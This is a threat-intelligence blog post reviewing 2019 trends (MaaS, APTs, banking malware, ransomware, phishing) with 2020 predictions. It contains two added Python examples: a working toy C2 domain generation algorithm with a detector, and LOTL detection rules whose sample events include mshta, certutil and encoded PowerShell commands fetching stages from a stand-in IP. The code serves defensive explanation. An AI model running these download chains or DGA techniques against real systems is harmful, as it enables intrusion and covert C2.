04.02.2020

2019 Threat Intelligence Trends and 2020 Predictions

In this blog post we look at the top trends and patterns that EclecticIQ Fusion Center analysts identified throughout 2019. The post is not an exhaustive account of all activity and threats in 2019; it is a high-level overview of what the Fusion Center considers noteworthy from the end of 2018 into 2020. Analysts used internal resources and external reporting to support the findings.

Key Findings between 2018 and 2019

  • Malware-as-a-Service is greatly expanding
  • Threat actor infrastructure is increasingly being co-opted by other operators
  • Malware popularity was similar between 2018 and 2019

Key Predictions for 2020

  • Threat actor infrastructure will consolidate and make fingerprinting more difficult
  • Android will be the most victimized mobile OS
  • Phishing will continue to deliver the greatest volume of attacks
  • CVEs will increase in volume, and widely exploited CVEs will lead to more devastating attacks
  • Climate change policy will be the primary driver for further hacktivist activity

Analysis of Last Year's Predictions for 2019 

  • Significant increase in the use of open and publicly available tools as malware platforms for operations

Analysts observed a marked increase in Malware-as-a-Service (MaaS) attacks over 2019. MaaS commoditizes many pieces of malware into ‘tools’ that are licensed out for criminal activity against information networks.

There are two main drivers for expanding malware markets. First, malware development is fundamentally changing. The number of unique malware samples has grown rapidly year over year, and the industry is passing the point where malware is a scarce resource: new malware detections rose only marginally from 2018 to 2019, while enough well-developed variants are in circulation that a market of buyers and sellers is emerging. MaaS employs different TTPs (Tactics, Techniques, and Procedures) from custom malware; MaaS typically involves heavy reuse of attack patterns. MaaS activity is further promoted by changes to Dark Web marketplaces that connect buyers and sellers to larger audiences (see report above). Increased malware circulation drives an increase in attack volume.

Second, threat actors are increasingly and deliberately sharing infrastructure. Historically, threats and attacks were tailored to the specific systems or networks they were attempting to access. This allowed analysts to identify unique attack patterns and command-and-control (C2) infrastructure, and attribution was not as difficult. Throughout 2019, as an offshoot of growing MaaS operations, threat actors have been sharing entire C2 infrastructures, which makes final attribution more difficult.

MaaS samples are built to be highly modular and adaptable to different attacks. A modular design necessarily includes a robust C2 module, and C2 networks increasingly rely on encryption and layers of obfuscation.

On a higher level, analysts observe more cooperation between well-organized cybercriminal gangs. Different groups partner to increase the effectiveness of attacks.
 

  • Increased political instability will lead to more nation-state attacks

There has been an increase in political instability across the globe over 2019, and also an increase in reporting of APT activity: the EclecticIQ Threat Intelligence Platform holds 425 more APT reports for 2019 than for 2018. However, there is no clear causal relationship between these two observations, as attribution is becoming more obscured. The success of past attacks and the spreading or sharing of attack infrastructure is likely supporting additional nation-state sponsored attacks. This is evident in Southeast Asia (SEA), where analysts observe Vietnam-based groups greatly expanding State-backed operations in the region; the most active group was APT32.

Evidence from 2019 points to multiple nation-states taking an interest in the Indonesian general election of 2019. China, continuing its Belt and Road Initiative partnerships with other nations, has run a steady stream of espionage activity to gain a competitive advantage in negotiations.

Increased attacks are also evident in the Middle East. Threat intelligence analysts observe more activity that is very likely stimulated by the continued political struggle centred on Iran. Threat intelligence sharing is enabling better detection and description of advanced attacks that fall under the umbrella of State-sponsored activity, which may be a simple explanation of why more reporting is observed. Analysts also noted that attacker dwell time is decreasing.

  • Attribution will add less value from a threat intelligence perspective

A trend EclecticIQ threat intelligence highlighted in 2019 is the blurring of attack infrastructure across the internet, reflected in the TTP sharing discussed above. When threat actors use TTPs associated with other groups, attribution becomes less valuable, because threat actors increasingly operate in similar ways with similar objectives. Analysts also note that State-linked security companies are developing malware and selling it to governments, which is a special case of MaaS. Example organizations that develop highly advanced malware include NSO Group, operating out of Israel, and Zerodium, an exploit broker known to supply 0-days to governments (see CVE-2018-16983). This type of malware allows deeper penetration of specialized networks, such as the SS7 mobile signalling network, that would otherwise be difficult to access without purpose-built tools.

Activity Observed in 2019

  • APT and State-Linked Activities

EclecticIQ analysts predicted further APT activity consolidating in the Middle East, mainly around Iran, and in Southeast Asia centred on Vietnam, China, and North Korea. 2019 reporting of APT operations most heavily covered the Middle East, Southeast Asia, and Russia. The uptick in Middle East APT operations was especially prevalent in 2019, with extensive reporting of Iran-linked APT activity. Analysts expect heightened activity following the rise in geopolitical tensions in the region as Western countries confront Iran.

Analysts have seen multiple aggressive campaigns operated by groups with links to Russia this year. A lengthy report covering The Dukes, a Russian APT group (or cluster of groups), shows that Russia is still operating aggressively across the globe after the 2016 US election interference. The FinSpy intrusion set also exhibited steady operations against global financial targets in 2019, and threat actor TA2101 was active globally with advanced phishing operations. EclecticIQ analysts note that this focus may be the result of Western bias within threat intelligence.

  • Malware and Attack Patterns (TTPs) in Review

Malware trends in 2019 are similar to those observed in the 2018 Trend Report. Bots, banking malware, and Remote Access Trojans (RATs) took the top spots in 2019. Current vendor reporting (Cisco, Proofpoint) supports this.

Botnets are driven and supported in their main capabilities by robust C2 infrastructure. Increasingly, botnet C2 communications are encrypted, and bots carry domain generation algorithms (DGAs) that derive new C2 addresses dynamically rather than relying on hard-coded ones. A botnet foothold opens an organization to a variety of further risks, as the operator can deliver follow-on payloads at will.
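As an added illustration of the dynamic C2 addressing described above (this is example code, not code from the original post or from EclecticIQ), the block below pairs a toy domain generation algorithm with a simple scorer that flags DGA-like names in DNS query logs. The DGA, its seed, the scoring thresholds, the log format and the sample log lines are all hypothetical and constructed for the example.

```python
"""Added example (not EclecticIQ's code): a toy domain generation algorithm
(DGA), of the kind botnets use to rotate C2 addresses, beside a scorer that
flags DGA-like names in DNS query logs.  The DGA, its seed, the thresholds
and the log format are all hypothetical and constructed for illustration."""
import hashlib
import math
import re
from collections import Counter

TLDS = ("com", "net", "org")
VOWELS = set("aeiou")


def dga_domains(seed, day_iso, count=5):
    """Hypothetical DGA: bot and operator share `seed`; both derive the same
    `count` candidate C2 names for the date `day_iso` (e.g. "2019-11-04")
    with no hard-coded address.  A defender who recovers the seed from a
    sample can pre-compute and sinkhole the same list."""
    domains = []
    for i in range(count):
        digest = hashlib.sha256(f"{seed}:{day_iso}:{i}".encode()).hexdigest()
        # 12 pseudo-random lowercase letters from the first 24 hex digits
        label = "".join(chr(ord("a") + int(digest[j:j + 2], 16) % 26)
                        for j in range(0, 24, 2))
        domains.append(f"{label}.{TLDS[i % len(TLDS)]}")
    return domains


def shannon_entropy(text):
    """Bits per character; random labels score well above dictionary words."""
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def longest_consonant_run(label):
    runs = re.findall(r"[^aeiou]+", label)
    return max((len(r) for r in runs), default=0)


def registrable_label(domain):
    """Label immediately left of the TLD (a real deployment would consult a
    public suffix list so that example.co.uk resolves to 'example')."""
    labels = domain.lower().rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def dga_score(domain):
    """Heuristic 0-4 score; 3 or more is treated as DGA-like.  Thresholds are
    illustrative and would be tuned against a baseline of real traffic."""
    label = registrable_label(domain)
    if not label:
        return 0
    vowel_ratio = sum(ch in VOWELS for ch in label) / len(label)
    checks = (
        len(label) >= 10,                    # long random labels
        shannon_entropy(label) >= 3.0,       # high character diversity
        vowel_ratio < 0.3,                   # unpronounceable
        longest_consonant_run(label) >= 4,   # no syllable structure
    )
    return sum(checks)


# Constructed log format: "<timestamp> <client> query <type> <qname>"
LOG_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+query\s+\S+\s+(?P<qname>\S+)$")


def triage_dns_log(lines, threshold=3):
    """Return (client, qname, score) for queries at or above the threshold."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # skip lines that do not fit the constructed format
        qname = m.group("qname").lower().rstrip(".")
        score = dga_score(qname)
        if score >= threshold:
            hits.append((m.group("src"), qname, score))
    return hits


# Constructed sample lines, not real traffic
SAMPLE_LOG = [
    "2019-11-04T10:15:01Z 10.0.0.7 query A www.google.com",
    "2019-11-04T10:15:02Z 10.0.0.7 query A xkqzvbtnwplr.com",
    "2019-11-04T10:15:03Z 10.0.0.9 query A update.microsoft.com",
    "2019-11-04T10:15:04Z 10.0.0.9 query A mail.eclecticiq.com",
]

if __name__ == "__main__":
    print("today's C2 candidates:", dga_domains("constructed-seed", "2019-11-04"))
    print("flagged queries:", triage_dns_log(SAMPLE_LOG))
```

The generator side shows why a recovered seed is valuable to defenders: the same function that gives the bot its daily rendezvous points gives the analyst tomorrow's domains to register or sinkhole. The scoring side uses only coarse lexical signals (length, entropy, vowel ratio, consonant runs), which catch random-looking labels like the toy DGA's output but will miss dictionary-based DGAs and need a public suffix list before use on real traffic.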

Banking malware is prominently featured as MaaS on many Dark Web marketplaces. It has seen significant development, both in the range of applications that can be targeted and in the ability to retrieve login-overlay web templates (web injects) from centrally managed repositories. These templates are realistic and effective. In 2019 some of the most advanced banking malware originated in and spread out from Brazil. Analysts do not see a marked increase in 2FA interception capability, but the threat persists.

RATs are becoming more specialized, more modular, and stealthier during installation. Some RAT families are evolving into dedicated loaders that retrieve the final payload over multiple stages. Custom RATs are still the main payload in more advanced campaigns. The attack patterns used to stage the malware typically involve Living-off-the-Land TTPs (abusing legitimate, signed system binaries and scripting engines), which make the operations harder to detect once they slip past perimeter defenses. A large part of this development can be attributed to threat actors sharing infrastructure, which is speeding up malware development.
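To make the Living-off-the-Land staging concrete, here is an added example (not EclecticIQ's code and not from the original post) of a small rule set run over process-creation events, flagging the points where a signed Windows binary is used to fetch or execute a further stage. The key="value" event format, the rule names, the IP address and the sample events are constructed for illustration; a real deployment would feed the same logic Sysmon Event ID 1 or EDR process telemetry and tune the patterns against its own administrative baseline.

```python
"""Added example (not EclecticIQ's code): a small rule set that flags
Living-off-the-Land loader behaviour in process-creation events, where a
signed Windows binary is abused to fetch or run the next stage.  The
key="value" event format and the sample events are constructed for
illustration; a real deployment would feed it Sysmon Event ID 1 or EDR
process telemetry and tune the patterns against its own admin baseline."""
import re

# (rule name, image basename pattern, command-line pattern)
LOTL_RULES = [
    ("mshta_remote_script", r"^mshta\.exe$", r"https?://|javascript:|vbscript:"),
    ("regsvr32_scriptlet", r"^regsvr32\.exe$", r"/i:\s*https?://|scrobj\.dll"),
    ("certutil_download_or_decode", r"^certutil\.exe$", r"-urlcache|-decode|-encode"),
    ("rundll32_script", r"^rundll32\.exe$", r"javascript:|\.dll\s*,\s*\w+.*https?://"),
    ("powershell_hidden_or_encoded", r"^powershell\.exe$",
     r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|-w(indowstyle)?\s+hidden|downloadstring|\biex\b"),
    ("bitsadmin_transfer", r"^bitsadmin\.exe$", r"/transfer"),
    ("wmic_process_create", r"^wmic\.exe$", r"process\s+call\s+create"),
]

# An Office process spawning one of these is a strong maldoc indicator on its own
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {"powershell.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe",
           "regsvr32.exe", "certutil.exe", "rundll32.exe", "bitsadmin.exe"}

PAIR_RE = re.compile(r'(\w+)="([^"]*)"')


def parse_event(line):
    """Parse the constructed key="value" format into a dict with lowercase keys."""
    return {k.lower(): v for k, v in PAIR_RE.findall(line)}


def basename(path):
    return path.lower().replace("\\", "/").rsplit("/", 1)[-1]


def evaluate(event):
    """Return the names of all rules matched by one process-creation event."""
    image = basename(event.get("image", ""))
    parent = basename(event.get("parentimage", ""))
    cmdline = event.get("commandline", "")
    matches = [name for name, image_re, cmd_re in LOTL_RULES
               if re.search(image_re, image) and re.search(cmd_re, cmdline, re.IGNORECASE)]
    if parent in OFFICE_PARENTS and image in LOLBINS:
        matches.append("office_spawns_lolbin")
    return matches


def scan(lines):
    """Return [(utctime, image, [rule names])] for events matching any rule."""
    hits = []
    for line in lines:
        event = parse_event(line)
        rules = evaluate(event)
        if rules:
            hits.append((event.get("utctime", "?"), event.get("image", "?"), rules))
    return hits


# Constructed sample events modelling a maldoc -> mshta -> certutil -> powershell
# chain, plus two benign events (legitimate certutil use, notepad) as controls.
SAMPLE_EVENTS = [
    'UtcTime="2019-10-02 09:14:03" ParentImage="C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE" '
    'Image="C:\\Windows\\System32\\mshta.exe" CommandLine="mshta.exe http://203.0.113.10/stage1.hta"',
    'UtcTime="2019-10-02 09:14:05" ParentImage="C:\\Windows\\System32\\mshta.exe" '
    'Image="C:\\Windows\\System32\\certutil.exe" '
    'CommandLine="certutil.exe -urlcache -split -f http://203.0.113.10/stage2.bin C:\\Users\\Public\\s.bin"',
    'UtcTime="2019-10-02 09:14:09" ParentImage="C:\\Windows\\System32\\cmd.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    'UtcTime="2019-10-02 09:20:00" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\certutil.exe" CommandLine="certutil.exe -verify C:\\Temp\\cert.cer"',
    'UtcTime="2019-10-02 09:21:00" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\notepad.exe" CommandLine="notepad.exe C:\\Users\\alice\\notes.txt"',
]

if __name__ == "__main__":
    for utctime, image, rules in scan(SAMPLE_EVENTS):
        print(utctime, basename(image), ", ".join(rules))
```

Two design points matter more than the individual patterns. First, the rules key on the combination of binary and command line, so routine administrative use of the same binaries (the certutil -verify control event) is not flagged. Second, the parent/child relationship is a signal in its own right: an Office process launching a scripting host is suspicious regardless of arguments, and correlating the three flagged events by parent process is the natural next step for reconstructing a multi-stage loader chain.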

Ransomware is evolving rapidly as Big Game Hunting (BGH) ransoms are paid. Ransomware groups have increasingly targeted organizations higher in the software supply chain (MSPs, CDNs). Ransomware TTPs have distinctly shifted towards BGH attacks and attacks on health and education institutions. A major development in 2019, highlighted by the Maze ransomware family, is double extortion: the threat actors first exfiltrate the victim's data and then encrypt it, releasing the data publicly if the ransom is not paid.

Mobile malware is now a standard part of the toolset of many APT intrusion sets; the WhatsApp 0-day from 2019 is a good example. The growth in mobile malware follows our growing reliance on mobile devices. Reporting indicates widespread penetration of cellular networks and mobile protocols, including targeted SIM card exploitation. Mobile spyware of this type, operated by unknown threat actors, was able to penetrate the SS7 network extensively to target specific individuals. It is strongly suspected that this capability remains in the hands of State governments and has not yet spread widely.

  • Financial Crimes Exploit Systems Higher in Supply Chains

In 2019, intrusion sets that target payment card data, such as Magecart, went after supply chains at a greater pace, including the compromise of CDNs and managed SaaS payment platforms.

Cryptocurrency attacks, while still targeting individuals, show a trend toward targeted attacks on entire exchanges and trading platforms. Analysts observe ransomware currently displacing cryptojacking attacks, which is expected to continue unless there is another spike in cryptocurrency valuations.

Ransomware operators popularly target MSPs to spread infection. Analysts also observed advanced campaigns, such as ShadowHammer, use supply chain compromise as the cornerstone of their attack pattern, with very effective results.

Phishing continues to be a low-barrier attack vector and the most popular delivery vector by volume. Phishing TTPs continue to get better at penetrating human and machine defenses despite security advances. One important development analysts observed in 2019 is the ability of malware modules to harvest real email content from infected hosts and weaponize it in further attacks, as Emotet does by replying into existing email threads.

Business Email Compromise (BEC) was also notable in 2019. Active groups include Silent Starling, London Blue, and Silver Terrier. BEC TTPs rely on social engineering over multi-stage attacks, which makes the operations particularly effective. BEC in 2019 has been successful enough to draw attention from the FBI and the BBB.

2020 Predictions

  • APT and State-linked operations will continue to follow geopolitical conflicts
  • Infrastructure will further consolidate and will be further co-opted by threat actors, including APT groups
  • Major criminal networks will develop stronger inter-networks with others to support operations. One effect this will have is to further blur the lines between State-linked APT and traditional criminal operations
  • Malware variants are evolving to coordinate together. Different malware components will increasingly borrow and share interchangeable modules like plugins or apps involving multiple developers and code overlaps.
  • Analysts expect to see mobile malware attack volumes increase again through 2020. Android OS will continue to be attacked in high volume due to its popularity, not only on mobile devices, but increasingly installed on IoT devices, such as public display boards. 
  • Ransomware payments will increase in smaller, less capable industries and organizations. As BGH TTPs mature, threat actors will likely turn the same TTPs on smaller organizations
  • Cryptocurrency attacks are expected to remain popular and steady, pending any significant crypto-valuation fluctuations. New major players entering cryptocurrency (Facebook Libra) are expected to increase attack volume. 
  • APT style attack patterns are expected to become more widespread as MaaS and infrastructure sharing grow and introduce further threat-actor participants.
  • Phishing attacks will become much more automated and low-touch for threat actors while maintaining high efficacy. Ransomware will continue displacing cryptojacking attacks unless there is a spike in cryptocurrency valuation
  • The disclosure of CVEs will continue to rise steadily
  • High levels of threat intelligence reporting will force high-profile APT groups to change TTPs in favor of completely custom operations as a way to avoid detection and attribution

Read the full report including the 2020 Threat Intelligence-based Security Recommendations here